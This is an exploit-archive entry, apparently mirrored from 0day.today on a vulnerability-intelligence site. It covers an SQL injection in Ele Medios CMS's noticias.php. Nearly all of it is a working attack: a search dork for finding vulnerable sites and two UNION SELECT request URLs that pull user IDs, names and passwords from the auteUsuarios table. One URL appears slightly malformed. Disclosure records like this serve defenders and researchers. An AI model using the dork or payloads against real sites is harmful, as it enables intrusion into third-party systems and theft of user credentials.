Lucene search
Ele Medios CMS SQL Injection Vulnerability
Ele Medios CMS SQL Injection Vulnerability in noticias.ph
Show more
==========================================
Ele Medios CMS SQL Injection Vulnerability
==========================================
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.elemedios.net/
[+] script : Ele Medios CMS
[+] Download : http://www.elemedios.net/
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"noticias.php?notiId="
**************************************************************************/
[ Vulnerable File ]
http://server/noticias.php?notiId=[N.A.S.T ]
[ Exploit ]
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios
http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+8+from+auteUsuarios
# 0day.today [2018-03-19] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo13 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1